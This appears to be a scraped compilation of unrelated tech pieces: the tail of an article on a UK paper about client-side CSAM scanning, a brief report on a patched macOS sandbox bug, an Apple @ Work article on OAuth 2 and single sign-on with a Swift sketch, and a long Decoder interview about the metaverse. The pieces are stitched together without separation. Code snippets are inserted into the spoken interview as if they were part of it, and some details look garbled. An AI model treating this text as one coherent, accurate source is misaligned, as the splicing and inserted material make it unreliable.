Cupertino's technology would search for images using the NeuralHash machine-learning model to identify CSAM, a model the Brit duo say "should be reasonably simple to engineer." The problem is that the same tech could also be used to identify, filter out, and report other images – such as pictures mocking political leaders or expressing a viewpoint someone wanted to monitor.

Levy and Robinson think this is a fixable problem. More research is needed. Also, human moderators should be able to intervene to catch false positives before suspected images are passed to law enforcement to investigate.

Not my problem

Interestingly, the two make the point repeatedly that this is going to be the service providers' responsibility to manage. While insisting the paper is not official government doctrine, it's clear Her Majesty's Government has no intention of picking up the tab for this project, nor overseeing its operation.

"These safety systems will be implemented by the service owner in their app, SDK or browser-based access," they say. "In that case, the software is of the same standard as the provider's app code, managed by the same teams with the same security input." 

And allowing private companies to filter user data with government approval has always worked so well in the past. This is an old, old argument – as old as encryption itself.

We saw it first crop up in the 1970s when Whitfield Diffie and Martin Hellman published on public-key encryption (something GCHQ had apparently developed independently years before). Such systems were labelled munitions, and their use and export severely limited – PGP creator Phil Zimmermann suffered three years of investigations in the 1990s over trying to enable private digital conversations.

As recently as 2019, someone at the US Department of Justice slipped the leash and suggested they didn't want a backdoor, but a front one – again using the CSAM argument. Some things never change. ®

macOS Bug Could Let Malicious Code Break Out of Application Sandbox

Microsoft has revealed a now-fixed flaw in Apple's macOS that allowed specific kinds of code to bypass the operating system's App Sandbox restrictions on third-party applications, potentially allowing attackers to escalate device privileges and install additional malicious payloads.

Microsoft shares credit for the find (CVE-2022-26706) with researcher Arsenii Kostromin, the company said in its announcement, adding that Apple patched the vulnerability in its May 16 security update.

The team at Microsoft discovered the bug while researching malicious macros in Microsoft Office for macOS, they explained in a recent blog post.

"Our research shows that even the built-in, baseline security features in macOS could still be bypassed, potentially compromising system and user data," the team wrote. "Therefore, collaboration between vulnerability researchers, software vendors, and the larger security community remains crucial to helping secure the overall user experience. This includes responsibly disclosing vulnerabilities to vendors."


Apple @ Work: macOS Ventura and iOS 16 drive Apple's vision for identity in the enterprise


In the podcast I did from 2012 to 2017 with Fraser Speirs, I became very focused on identity becoming a central part of the IT management experience. That period covered the continued transition from on-prem servers and services to SaaS becoming the default. Apple's vision for single sign-on in the enterprise took another step forward at WWDC 2022, so let's look at what was announced regarding SSO, IdPs, and Apple's identity vision for the enterprise.

About Apple @ Work: Bradley Chambers managed an enterprise IT network from 2009 to 2021. Through his experience deploying and managing firewalls, switches, a mobile device management system, enterprise-grade Wi-Fi, 100s of Macs, and 100s of iPads, Bradley will highlight ways in which Apple IT managers deploy Apple devices, build networks to support them, train users, stories from the trenches of IT management, and ways Apple could Boost its products for IT departments.


OAuth 2 support

In iOS and iPadOS 15, Apple used a simple access token authorization mechanism to allow the device management server to verify a user’s identity. In iOS and iPadOS 16, Apple is taking it to the next level by adding OAuth 2 support. OAuth 2 support will allow MDM servers to support a wider variety of identity providers who are already compatible with OAuth 2. Instead of building a custom integration, MDM providers can leverage OAuth 2 for any provider that supports it.
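
In practice this means the enrollment flow can lean on the standard OAuth 2 authorization-code exchange. The sketch below is generic; the endpoint, client ID, and redirect URI are placeholders, not anything Apple has specified.

```swift
import Foundation

// Generic OAuth 2 token exchange of the kind an MDM enrollment can now rely
// on. Endpoint, client ID, and redirect URI are placeholder values.
var request = URLRequest(url: URL(string: "https://idp.example.com/oauth2/token")!)
request.httpMethod = "POST"
request.setValue("application/x-www-form-urlencoded", forHTTPHeaderField: "Content-Type")
request.httpBody = [
    "grant_type=authorization_code",
    "code=AUTH_CODE_FROM_LOGIN",
    "client_id=mdm-enrollment",
    "redirect_uri=https://mdm.example.com/callback"
].joined(separator: "&").data(using: .utf8)

URLSession.shared.dataTask(with: request) { data, _, _ in
    // A successful response carries the access token the MDM server verifies.
    if let data = data { print(String(decoding: data, as: UTF8.self)) }
}.resume()
```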

Enrollment Single Sign-on

Enrollment Single Sign-on is a new method for personal devices to complete an MDM enrollment and access company apps and web SaaS platforms with a single authentication. Once you obtain an app that’s compatible with Enrollment SSO, a user can be automatically logged in with their Managed Apple ID that’s synced to Azure AD or Google Workspace. In order to use Enrollment SSO, you’ll need:

  • An app that’s been configured to support enrollment SSO
  • MDM solution that’s been federated with an identity provider
  • Managed Apple ID created in Apple Business Manager (or Apple School Manager)
  • An MDM server that’s been configured to return information the app needs to authenticate the end-user

Enrollment Single Sign On won’t be available at launch, but will come in a later update to iOS 16.

Platform Single Sign-On


In macOS 13 Ventura, Platform Single Sign-On allows end users to sign in once at the macOS login window and then be signed in automatically to apps and websites that work with the identity provider the company uses. An example here would be signing in to macOS using Okta at the login window and then automatically being logged in to Slack and Jira instances that use the same IdP. Apple said that Platform SSO is the modern replacement for Active Directory binding (good riddance).

Summary on Apple’s vision for identity

Apple announced some exciting things at WWDC 2022 relating to its vision for identity. These announcements are just the beginning of the process, as MDM and IdP vendors will need to build in support once Apple ships this functionality later in the iOS 16 and macOS Ventura release cycles, but it is indeed a compelling vision for the future of identity in the workplace.

Is the metaverse going to suck? A conversation with Matthew Ball

Let’s talk about the metaverse.

You probably can’t stop hearing about it. It’s in startup pitches, in earnings reports, some companies are creating metaverse divisions, and Mark Zuckerberg changed Facebook’s name to Meta to signal that he’s shifting the entire company to focus on the metaverse.

The problem, very simply, is that no one knows what the metaverse is, what it’s supposed to do, or why anyone should care about it.

Luckily, we have some help. Today, I’m talking to Matthew Ball, who is the author of the new book called The Metaverse: And How It Will Revolutionize Everything. Matthew was the global head of strategy at Amazon Studios. In 2018, he left Amazon to become an analyst and started writing about the metaverse on his blog. He’s been writing about this since way before the hype exploded, and his book aims to be the best resource for understanding the metaverse, which he sees as the next phase of the internet. It’s not just something that you access through a VR headset, though that’s part of it. It’s how you’ll interact with everything. That sort of change is where new companies have opportunities to unseat the old guard.

This episode gets very in the weeds, but it really helped me understand the decisions some companies have made around building digital worlds and the technical challenges and business challenges that are slowing it down — or might even stop it. And, of course, I asked whether any of this is a good idea in the first place because, well, I’m not so sure. But there’s a lot here, so listen, and then you tell me.

Okay, Matthew Ball. Here we go.

Matthew Ball is the managing partner of Epyllion and the author of a new book called The Metaverse: And How It Will Revolutionize Everything. Welcome to Decoder.

Glad to be here.

You are also the proprietor of an excellent Twitter feed about the metaverse. Do you think of Twitter as your primary platform?

I do. It is my most used app. TikTok is creeping up there — and of course my Screen Time doesn’t register Fortnite — but Twitter is definitely my primary channel and where I learn the most.

You have been tweeting about the metaverse for quite some time, and you obviously have a big audience on Twitter. From a media nerd perspective, why turn it into a book?

Thanks for the tee up. I started writing about this fascinating topic in 2018. The term comes from the early ‘90s, but the ideas span back to the ‘30s. This truly century-old idea was finally practical, that is to say, we could start building it and trying to realize it. Over the following years, I got smarter in the area, received more input from other people, and more projects came to bear.

Then suddenly last year it became the word du jour. Not only did Facebook rename themselves, but Google also did a reorg, Amazon started redoing job descriptions, and many of the fastest-growing companies in media tech — Roblox, Unity, Epic — wrapped themselves around the theme. Yet there was very little actually articulating what it is, why it mattered, and what the challenges were.

I was really excited about crystallizing that, distilling my thinking into something more concrete, updating the things that I got wrong, making sure that it was comprehensible, but the most important thing was actually social. Every time we have a platform shift, we have an opportunity to change which companies lead, which philosophies, which business models. I think many people are coming out of the last 15 years dissatisfied with the lack of regulation, the take rates, the role of algorithms, monetization, and which companies lead — and who leads, frankly. The best way to positively affect that outcome was to be informed about what was next. That is the goal.

We have to start at the beginning. There are a couple chapters at the beginning of the book where you talk about that long history and how it has built up to this moment. The third chapter is called “A Definition Finally,” which is great because I feel like the definition of the metaverse really does need that “finally” moment. What is your definition of the metaverse?

I cheat here a little. It is more helpful to describe it similarly to defining the internet as TCP/IP, the internet protocol suite. The description is what is more helpful.

It is a massively scaled and interoperable network of real-time, rendered, 3D virtual worlds that can be experienced synchronously and persistently by an effectively unlimited number of users, each with an individual sense of presence. It has the technologies, capabilities, and standards to support what is essentially a parallel plane of existence that spans all virtual worlds and the physical world. From a human outcome, it means that an ever-growing share of our time, labor, leisure, wealth, happiness, et cetera, will exist in virtual spaces.

One of the key pieces of that definition is “3D virtual worlds.” I have heard other definitions of the metaverse that are a little bit more expansive, that get you to a place where Wordle is the metaverse. We are all doing it together once a day, so we exist in the universe of Wordle, however that universe is defined. You are saying this has to be 3D; it effectively has to be a video game. You get to a place where Fortnite, Roblox, or any number of other massively multiplayer online games is the metaverse. Does that count for you?

It is really a question of “what is” versus “what connects to and is part of” it. My building that I am speaking to you from right now is not the internet, nor really on the internet, yet it is part of the internet in one way, shape, or form. Wordle, of course, is mostly locally run on your device. You would not really call it an internet service, but some of it is delivered.

When you are talking about the metaverse as a new computing platform, for me, 3D is a requirement to do many new things, to elevate human existence — especially in key categories such as healthcare, education, and so forth — but the term really does not matter. What is in and out does not matter. It is likely we never say “metaverse.” In China, they have adopted the term “hyper-digital reality.” We may talk about the 3D internet, or we may just use the term internet. What matters is the real-time rendered element, which basically means the world as it exists is legible and changeable to software, and the advent of graphics compute. It does not need to be a game, it is just an expression.

I understand what you are saying. It is the description that matters, and this word may go out of fashion. Let me just push on that description and definition a little bit.

Right now you can log into Fortnite and run around with a bunch of friends. It is cross-compatible with many different kinds of devices, so it does not matter what hardware you have in your house. You are in a persistent online space where lots of other people are. Are you saying that because Fortnite does not connect to Roblox, it is not the metaverse?

This would be a little bit like asking, “If AOL ran on multiple different devices and a few different networks, is that the internet?” We could say it is, but if you talked about just AOL services in particular, you would be talking about a proprietary platform. You would not be talking about a unified experience that spans into industry with myriad different outputs, servers, or domain registrars.

The metaverse is really describing that unified experience, rather than a single expression, much like we would not say Facebook is “an” internet or “the” internet. When you are talking about Fortnite, there are certainly a bunch of things that do not fit there. It is not actually a persistent experience, and there are very few people who can connect to it at one point. Nominally, there are 100 people in a match, but they use a bunch of cheats so that there are only really 12 people that matter. It also does not connect into anything that isn’t purely game-like and leisure-oriented.

The definition of the internet at its most basic levels is a network of networks. You are connected to the network at university, work, or home, where you can go out and connect to Amazon’s network of servers to browse, then leave Amazon and connect to Facebook’s network of servers to do stuff there. You are saying the metaverse is the same thing as that overarching network of networks; it is the connectivity between multiple, different 3D worlds.

That is right.

What I would push on there is that the internet did not have to be built that way. The AOL example is very interesting, because AOL did not want it to go that way. The value plummeted when AOL went from being a provider of first-party services — like chat rooms, groups, and email — to an ISP that connected you to better versions of those services run by other people.

What is the push for Epic Games or Roblox to enable that connectivity? Historically, the people who own those experiences faced a raft of competition the second they gave them up. They kind of became dumb pipes and disappeared.

Let’s pause for a second. Of course, that was not the necessary outcome for AOL. We know now that no matter how successful AOL might have been in expanding its geographic footprint in connectivity, the largest opportunity for them was in horizontal software and services. There is a world where AIM, AOL Instant Messenger, becomes one of the world’s most significant communication platforms, like WhatsApp or Snapchat. There is a world in which its search engine turns into one of the world’s most dominant ad networks.

Microsoft is a pretty good example of that. They have never had a smaller share of computing devices, hardware, or operating systems, but their horizontal business is far more valuable than ever.

When you are talking about the incentives, first of all, we are already seeing this progress. The Roblox founder and CEO has been talking a lot about their explicit designs for interoperability. They have open-sourced some of their scripting languages, and he is even talking about embracing NFTs to take some projects off of Roblox.

Last week, the Metaverse Standards Forum was established under the Khronos Group — 28 companies such as Qualcomm, Epic, Meta, and others — specifically to solve this problem. Coming together is the easiest part. It is not forcing anyone to make a concession yet, to pick something that they did not advocate for, but is all in service of expanded network effects.

The belief is that if consumers can buy 3D objects that can be used in more places, or build up history that has more persistence and utility, it will grow much like the world economy did through trade. There were individual instances of compression, with some markets, some products, and some countries suffering from time to time, but the network was much stronger.

I will say you are right that the internet could have gone a different way, but we did have many competing inter-networking standards. There was a point in time in the early ‘90s where the Department of Commerce and the Department of Defense disagreed and pushed different standards. The idea that Comcast could email IBM, could email Telefónica, could email China Mobile, was really not the consensus. We had the protocol wars, but network effects and utility won out in the end.

The idea of a Metaverse Standards Forum is very funny to me. When covering consumer technology, you come up against standards bodies all the time, and they are hyper political. I would not say that Bluetooth is an example of the tech industry making something great that everyone loves, but it is pervasive in its way. The beginning of a standard and that early energy is great.

At some point, dollars are going to get allocated across whatever the metaverse is, and owning the early access points seems really valuable. Is this race and the amount of hype we are in now really about initiating the customer into whatever the metaverse is, to make sure that every time they buy something in another 3D world, you will get your 30% cut? Or is it, as you were saying at the beginning, that the technical ability to start building an early version of what you might consider the metaverse is a net good? Should we just start doing it and see what happens along the way?

I think the latter is more likely, but it is more of an organic process. If you take a look at one idea that we have long believed would have utility, a federated universal identity in digital space, Microsoft has tried that multiple times. The .NET Framework was the last big time they tried, but no one wanted it. It was rarely deployed, for many of the reasons you just mentioned. I do not want to use Microsoft’s account system.

What happened to be the best way to build the de facto standard for identity was Facebook, which started as a college hot-or-not. The best way for Epic to build a metaverse, or the metaverse, was not by trying to build it. It happened to be a battle royale game that was not even intended to be a battle royale. That is to say, this process starts from building something tangential, something 3D-oriented and social, that connects into another thing. Then you start to get organic alignment around that standard set.

You are right to be skeptical when someone says, “This is the thing, let’s all do it.” It rarely happens that way. It is actually more power-based.

You have described the metaverse as this parallel reality that you can live in and transact in, that will grow an economy that mirrors the world economy, because we will figure out some way to have scarce digital goods. I will come to the blockchain portion of this conversation later, but that is what you are describing.

In science fiction, where the word metaverse comes from, that vision is always dystopian. In the book, you refer to Neal Stephenson’s Snow Crash a lot, and you point out that the metaverse in Snow Crash made life in the real world notably worse. The heart of the tension for me is the idea that we will build a parallel world and end up as so many brains transacting on other people’s platforms. I have an instinctive recoil from that which makes me skeptical of the entire enterprise, because I think life in the real world is actually rich and rewarding. I can go out and touch grass, and Apple, Google, Facebook, Epic, or whoever cannot get in the way of me doing that. Fundamentally, what makes this not the dystopia that it is always described as?

I agree with a lot of that and disagree with some of it. The literature for the metaverse, in its antecedents, is dystopic. One of the important reasons why that is the case is that the point of most fiction is human drama, especially science fiction.

Put another way, utopias tend not to make for much human drama. It is true that when you look at Neuromancer, The Matrix, Ready Player One, or back to the 1930s with Philip K. Dick and Isaac Asimov, these virtual planes of existence are not described favorably. Why? Because even when they are not negative in and of themselves, they lead to some disengagement with reality, and that is the problem. The technology is amoral; the consequences are not.

When you take a look at the actual attempts to build these things, whether that is multi-user shared hallucinations in the ‘70s, Second Life and other metaverse-style experiences from the ‘90s, or Roblox and Fortnite from the 2000s, the tone is very different. It is not dystopic; it is creation, exploration, identification, and collaboration. Those are all very important.

At the end of the day, I don’t know that scarcity is that important, and this is actually where I think I disagree with many of my peers in the investing community, especially in relation to the blockchain. I don’t really get virtual land, certainly not scarce virtual land. The two brilliant things about the internet are network effects and zero marginal costs. Trying to create a next version of the internet that constrains networks through money and introduces scarcity that need not be there, for a virtual plane of existence that does not actually need to simulate the real world, I don’t get and frankly don’t believe in.

We have done a lot of interviews with various Web3 folks on the show. I would say some of the themes there echo the themes you have brought up. There are a lot of people who, having built or invested or experienced the last 15 years of the internet, are dissatisfied with where we have landed. Can we build a new kind of internet that more effectively rewards creators and is not just about engagement metrics?

You talk about the metaverse and say, “Okay, I want to have digital goods. I want to buy and sell things here that create a world economy that rivals the real-world economy.” How do you do that without scarcity? Are we going to DRM all the virtual clothes? There is an element here that you need to create some sort of scarcity if your goal is to buy and sell 3D digital objects at a rate of transaction that mirrors the real world.

It is really interesting. This is where we get into a fundamental break between how different believers in the metaverse actually imagine the value. Just as I am not a believer in scarce virtual land that costs thousands if not millions of dollars, there is probably a pretty low ceiling to virtual goods and apparel. They are usually in support of experiences. It is either the experiences that drive the underlying value — as is the case in Fortnite — and not the items per se, or it is what we would consider graphics-based computing or simulation at large.

Let me make that less abstract. Jensen Huang, the founder and CEO of Nvidia, now the seventh-largest company globally, believes that the economy of the metaverse will eventually exceed that of the physical world. We are talking 51 percent, which would be $50 trillion per year in spending right now. He is not at all interested in virtual clothes or leisure. He is talking about real-time 3D simulations running on the world’s best development platform, which is the world. Simulating a building or a piece of infrastructure, where goods flow and why, or how you programmatically advertise in 3D space, often for physical things, certainly does not require scarcity of the odd avatar.

Explain that a little more directly. When you say the best development platform in the world is the world itself, do you mean the 3D environment that you are in?

I mean the physical world, the one that you are standing on and exist in right now, which has many of the attributes I mentioned such as persistence, maximum capacity, et cetera. I will provide two examples that are perhaps helpful.

Nvidia redesigned its headquarters with a real-time, rendered 3D simulation to understand every design choice. “What happens when you put a window in one spot, or use one construction material or another? At exactly 3:22 p.m. on November 22, what is the climate implication in the conference hall? How do you simulate the flow of energy, of heat, or the refraction of light to drive the energy needed to operate the building?”

We are seeing that premise being used to operate airports in real time. “Do we really want to move the flight from gate 82 to gate 80 because it is close by? Should we actually move it farther away for operational efficacy and safety reasons in case there is a flash flood, fire, or terrorist event?” We are talking about making the entire physical world legible to software in real time, with an augmented layer on top of it, impacting production flows in a factory or the flow of people in a facility and so forth.

Connect that to the metaverse for me. This is a concept that is often called digital twins. You build an operational, digital twin of an airport or your office building, and they can proceed down different timelines based on different choices to provide you a sense of what might happen if you make changes in the physical world. Do they interact? If someone is going from the digital twin of your office to the digital twin of the airport, is that where you think the metaverse is?

I think the idea of simulating physical environments more directly, more accurately, is very powerful. The idea that there will be some layer of commerce in those digital twins that is independent of what is happening in the real world seems like the big step.

There are two things to unpack. Number one, digital twins are not the metaverse. If the internet is a network of networks, of different autonomous systems exchanging information consistently under common protocols, then a digital twin is like an office network. It is the Vox ethernet.

It is the interconnection with other digital twins, other simulations, for the exchange of information — your user identity, your payment history, or your avatar if you so choose — that collectively produces the metaverse. In this instance, there is not necessarily any utility or purpose for you, the consumer, to explore the digital twin of the environment you are in.

You might wear augmented glasses in 2037, in which case a version of that digital twin is being overlaid selectively to you, but I don’t agree with the premise that we are going to navigate an airport by putting on a headset or taking out our device.

Are you saying you don’t agree with the premise that there will be pervasive augmented reality?

No, I do. My point is the digital twin, at least foreseeably, is a B2B application, not something that you, the consumer, are going to log into and explore. There is very little practical value right now in you saying, “I want to go navigate MIA, the Miami airport, in a 3D digital twin.” It is not interesting or useful. That does not mean it isn’t super valuable to the operator.

As you describe this, there are a bunch of very hard, technical problems to solve to make this all work. If I build a digital twin on Nvidia’s platform of the airport and someone builds another digital twin on another platform for the office building, it is not just me, the builder of the digital twin, that needs to want to inter-operate.

The platforms need a core capability to inter-operate. If I want to jump from Roblox to Fortnite, those companies have to agree that my avatar can go between the worlds. If I buy a gun in one video game and want to go to another video game where that gun is 100 times more powerful, I might just wreck it for everyone. Some of that is a very difficult technical problem, some of that is cultural, and some of that is straight up business and politics. Have you seen the beginnings of solutions to those problems?

You’re right. Most technology problems are only masquerading as technical problems, and are actually business and/or societal problems, as in “can we agree?” In the gaming community, I see limited benefit from taking your gun or avatar from one environment to another. That is not to say that there isn’t some utility, particularly with cosmetics that have no functional value. That is easier, but at the end of the day, how important is it that I can wear a banana Peely skin in Call of Duty? Probably not that important. The technical impediments, not to mention the commercial and creative ones, are pretty high.

When you take a look at industrial simulation, the utility there is a lot higher and the technical solutions are already in place. You mentioned Nvidia’s Omniverse platform, which is not really a platform in the same sense as Roblox or Minecraft; it is more of a middleware simulation DMZ. It is where companies like DeSo and Boeing take their simulations and interconnect them, with Nvidia’s machine learning upscaling, downscaling, translating, and then operating that simulation.

There is a lot of work to do if you want to talk about the progress. We do have some standards groups, but there is an old xkcd joke that basically says when there are 14 competing standards and everyone agrees on the need for one universal standard, you end up with 15 competing standards. So I don’t want to be too optimistic there.

What you see with Epic is one potential example. They launched their Epic Online Services, a live services suite where independent game developers can access Epic’s 500-million-account user base with 3.5 billion user connections — and at this point $30 billion in invested avatars and skins. This is just like The New York Times tapping into Facebook’s account system to speed up the user flow. Not to say that they don’t prefer their own account, but they recognize there is utility in getting some information.

You and I can go make a game and then access Epic’s avatar suite and its users, which drives smaller developers, who are less endowed technically and financially, to consolidate around Epic’s conventions, its file types, and its engine to tap into its networks.

I feel like we are bouncing back and forth between where the money is now and where the money will be in the future. To some extent, this is making my head spin. You are saying the money in the future is not just avatars, skins, and items. It is some massive B2B market where the real world is being simulated at a level of high fidelity, and some revenue will be created there as different businesses find different things to do for each other. The money right now is very much in Fortnite skins, right? How do you go from one to the other?

I don’t mean to oscillate between the two points. My point is rather that when people express skepticism as to whether or not standards and interoperability can be achieved, it is important to say that progress is happening. We had cross-platform gaming in 2018, we now have common account systems and entitlement systems from Epic, and we have the Omniverse platform for enterprise.

The fundamental tension you are talking about stems from the fact that, for decades, game engines and 3D simulations have essentially been good enough for leisure and not much else. Unreal, for example, is a non-deterministic physics engine. That means that if you throw a grenade eight times, you might get seven somewhat different answers.

It is only recently that the fidelity and sophistication of the simulation, and the investment that Epic has made into vertical solutions, make it practical enough for deployment in healthcare, military, education, and automotive. We are very early on that deployment curve. You need to get it right, then you need people to adopt it and so forth.

That is one of the reasons why we struggle with this odd juxtaposition of talking about the trillion-dollar metaverse economy while turning over and saying, “Right, but we are talking about $200 billion in gaming spend, mostly on cosmetics.”

I just keep coming back to the notion that the metaverse is the inter-connection between these worlds. That is where the value multiplier is. You can build all this stuff as one-offs, and all you have really ended up with is AOL and CompuServe. If you connect those things together and to 100 different networks and servers, then you have multiplied the value of all of it. Everyone rushes into it because it is so compelling that you cannot say no. Suddenly we end up in 2022, and every now and again I’m like, “Maybe we should turn it off.” It eats the world in a way that seems remarkable.

The immediate, compelling use of the internet was obvious to everyone, in the sense that if you wanted to look something up, you could just do it faster. Wikipedia comes into existence and suddenly the Encyclopedia Britannica seems unwieldy, old, and not up to date anymore. The other day I wanted to figure out how to cook something, so I watched a YouTube video and that was the end of it. I knew how to do it and we were off to the races. Where are the compelling, immediate uses of the metaverse that showcase that multiplicative effect, beyond just getting to the Boeing simulation faster?

To start with, I would personally disagree that the utility of the internet was self-evident. I mean, we have the classic Paul Krugman example in 1998.

Well, I am not saying some people weren’t wrong. I’m kidding around when I say that I was just smarter.

No, I agree with you. One of the weird things is that transition point was actually relatively late. Even as late as 1996, there were fewer than 50 million Americans who would use the internet in a month, and most of that use was pretty frivolous. When I was in high school, Wikipedia was seen as deleterious, as something that actually worsened education. I think that is part of it.

What we are seeing here is network effects. I don’t mean to be evasive, but we are talking about combinatorial innovation that is not yet present and therefore remains speculative. Take a look at the world economy, as an example. It is not that having independent nations and industries wasn’t hugely profitable, it was that the utility of all investments of all products in all markets went up.

In the social era, we easily take for granted that anything we create works everywhere. I create text, audio, video and I can take it anywhere. I can take a photo with my iPhone, it stores to iCloud, and I don’t have to say, “Well, darn, now I can’t put it on Facebook.” I can put it on Facebook, right click, save as, upload it to Snapchat, screenshot it on Snapchat, and put it into TikTok.

The utility of global commerce and trade, the utility of having common file formats, is really profound on the internet. It is so hard to create in 3D. Then you have this issue where the thing you want to do in 3D is in a different system from your partner’s. Unity and Unreal actually use different XYZ coordinates, if you can believe it.
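To make the coordinate mismatch concrete, here is a minimal sketch. Unity’s convention is left-handed with Y up and units in meters; Unreal’s is left-handed with Z up and units in centimeters. The axis mapping below is one common choice, not the only one, and real pipelines also have to reconcile rotations, winding order, and asset scale.

    # Hypothetical sketch of converting a position from Unity's convention
    # (left-handed, Y-up, meters) to Unreal's (left-handed, Z-up, centimeters).
    def unity_to_unreal(x, y, z):
        METERS_TO_CENTIMETERS = 100.0
        # Unity forward (+Z) -> Unreal forward (+X)
        # Unity right   (+X) -> Unreal right   (+Y)
        # Unity up      (+Y) -> Unreal up      (+Z)
        return (z * METERS_TO_CENTIMETERS,
                x * METERS_TO_CENTIMETERS,
                y * METERS_TO_CENTIMETERS)

    # One meter forward in Unity is 100 units forward in Unreal.
    print(unity_to_unreal(0.0, 0.0, 1.0))  # (100.0, 0.0, 0.0)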

It is kind of intuitive at this point to say we have had hundreds of billions of dollars in 3D assets invested, and all of those essentially get deprecated after their first use. That means that we either need to remake them, or we just will never use them. That is part of the premise here.

I will provide you a counterexample. Emoji is a big standard. It is run by a consortium, but it is rendered differently by every phone, by every platform. So the smiley face emoji…

I am an Android guy, I know it well.

It’s the grimace emoji, right? On Samsung phones, for a long time, it looked like it was smiling. Samsung owners were sending people grimaces when they meant smiles, or vice versa.
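What the consortium actually standardizes is the codepoint and the name; the glyph is left entirely to each vendor’s font, which is how the same character can grimace on one phone and smile on another. A minimal sketch of what the standard does pin down:

    # The standard fixes only the codepoint and name of an emoji;
    # how it is drawn is up to each vendor.
    import unicodedata

    grimace = "\U0001F62C"
    print(hex(ord(grimace)))          # 0x1f62c
    print(unicodedata.name(grimace))  # GRIMACING FACE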

You have a 3D file format, and everyone has agreed, “Okay, this is the one.” How do you make sure it is rendered across all these systems? Over time, will Samsung have to realize, “A lot of people are confused by our emoji, we should come together with Apple and make sure they look the same”? Google had to go from blobs to faces, which was very controversial in the virtual world, I will point out.

I like the blobs.

People love the blobs, and Google got rid of them because Apple is dominant and they needed to conform to what Apple emoji looked like. Do you see that playing out with 3D objects? Will an outfit or briefcase in Fortnite eventually come to dominate what it looks like everywhere else?

The example with emoji is a good one. It shows how slow-moving standards bodies, even when they are successful, end up being corralled by their dominant participants. Those participants are not overtly saying, “Here is what the standard should be,” but they drive all of the other members along. That actually helps with standardization.

When you are talking about 3D objects, there is a large contingent who believe that the consumer-facing 3D objects are less important. Bringing your briefcase from one environment to another is less important than having the environment itself be useful or repurposable for more developers. As an example, take the investment that Disney has made into Hoth, and make that into a virtual biking course used by Peloton, a dating simulation on Tinder, or a theme park in Fortnite. That is probably more useful.

When it comes to your question of visual cohesion, it is not just a question of how you want to express it. What dimensions do you need? What pixel density do you have? The technology for machine learning, particularly from Intel, to up- and downscale is pretty strong. You can take a 2D object and 3D-ify it. You can say The Verge makes virtual shoes that don’t separate between the sole and the fabric, but our system can actually separate the two for different designs. A lot of that is going to be interpretive software that takes what is not standardized and modifies it.

I feel like this is beginning to unlock for me in an important way. Unreal has moved into Hollywood, and it has moved into cars. You see this graphical engine appear in more and more places where graphics need to be rendered. So The Mandalorian renders the background on giant LED monitors behind the actors in Unreal, and now that same virtual world is available for Peloton to say, “We are going to bike through this environment.” Is that somehow an open platform for that kind of development?

You are quite right. Let me frame it a slightly different way. Entertainment is such a good example. Disney will spend $100 million producing backdrops in virtual environments for a film. Those are essentially all deprecated. They are increasingly used for the next film, but that is about it. What does that mean?

Well, if Peloton wants to build a Star Wars biking sim, they need to build it all. The business case might not be there. In addition, Disney might say, “Well, we have to make the thing, then we have to brand approve the thing, so we need to charge a lot.” So a lot of this does not happen. Once you start to standardize these 3D assets, you start to say, “We have made this investment and now we can use it wherever we want, or at least more extensively without building it anew.”

You take that from consumer leisure to, “Well, Ford has dimensionalized its next Ford Escape, so now we can simulate it in other enterprise environments, such as a car park for parking simulations.” A Hummer vehicle can use its lidar sensors to map the local area, then you can pre-drive that environment, like you would in a video game, to make sure that you can make the path. Making all of this information more repurposable starts to have extreme combinatorial effects, either by making new creations easier or cheaper.

Who controls the access and the connections between those things in your view of the metaverse? That seems like a very powerful vision, but then I start to pull the thread. If Disney has rendered out the world of The Mandalorian, I’m like, “I want to make print versions of The Verge for The Mandalorian.” I can imagine all these things we could do, but it feels like I still have to go get permission. The asset may be cheaper, but over time, content creation gets cheaper and cheaper anyway. Where does the technical part of availability come from? That seems like the hardest problem that we have been talking about.

There is no simple answer. These environments are managed centrally, and their permissions are going to be managed deliberately to start. If we have learned anything from the era of Shutterstock, TurboSquid, Quixel, or 3D asset databases, it is that the most valuable stuff, the IP, is not easily or cheaply licensed.

This is where we get into one of those fundamental questions of decentralization versus centralization. There are good arguments to be made that the last 15 years were too centralized, because the internet protocol suite has too little in it. We can get into that one way or another, but there are many forms of centralization that have nothing to do with technology per se. Revenue leads to greater investment and better products. IP centralizes or drives habit and retention. Brand keeps people inside of a system that they trust more than another.

This is the case even if you believe that the metaverse is a big, disruptive, next-generation internet, or if you believe in the wide deployment of blockchain and Web3 to democratize more of the stack. OpenSea is a great example of how we may still end up with no technical barriers to switching, but enormous habit and brand-based, or IP-based, stickiness to a few.

I feel like we have arrived at the Web3 portion of the conversation, so let’s talk about it. The ideas are in parallel, right? The amount of Web3 hype that has happened over the past 18 months is right next to the amount of metaverse hype. It feels like everybody wants to conflate them for some reason. Certainly, it is trendy in the business world to conflate them, to juice your stock price in some insane way.

They are not necessarily connected, but it does feel like the game of, “What are some use cases for Web3?” is best answered by, “There will be scarce digital objects in the metaverse.” There is a connection there. The open, technical questions of how these 3D worlds might work and how you might transact in them are actually answered by the blockchain, by Web3 technologies. Do you see that connection as directly? Do you think it is just a quirk of timing? Do you think there are other possible solutions?

I think that there are a few different things that we can unpack here. First and foremost, I and others, like Mark Zuckerberg and Tim Sweeney, describe the metaverse as a successor state, or quasi-successor, to today’s internet. Web3 is so named because it succeeds Web2. If both things come after the current thing, it makes sense that you have conflation.

In addition, there is a good reason to believe that the philosophies at minimum, or perhaps the technology at maximum, of blockchain are essential or important to the metaverse. Which is to say, property rights are probably going to be important, as they are to most economies. The ability to tap into decentralized or wide networks of contributors to provide extra GPU cycles, broadband, or just time and assets, which are currently hard to accumulate from individuals — Patreon only scales so much — are good reasons to believe that it is important to have a thriving metaverse, one that we want rather than one that is just technically possible.

I understand why the two are conflated, but I would say that they are separate. When you are talking about a good technological solution, when you talk about interoperability, you need a standard. You need someone to effectively take custody of an object and you need everyone to agree that they trust it.

The big problem that we have right now is EA and Activision do not have a good system to exchange anything. They certainly do not want to use one another’s new thing, should it exist. When other aggregators like Steam have tried in the past, no one opts in because the platform is already powerful enough.

Irrespective of whether or not blockchains are actually the ideal solution, they clearly have some revenue attached, speculative or not. They are proving themselves across a wide collection of different deployed solutions. At the end of the day, it is not always important whether something is perfect, insofar as whether or not everyone uses it. The GIF file format is awful. We have known that for decades and yet everyone uses it, and so that ends up being the thing. That to me is part of the case.

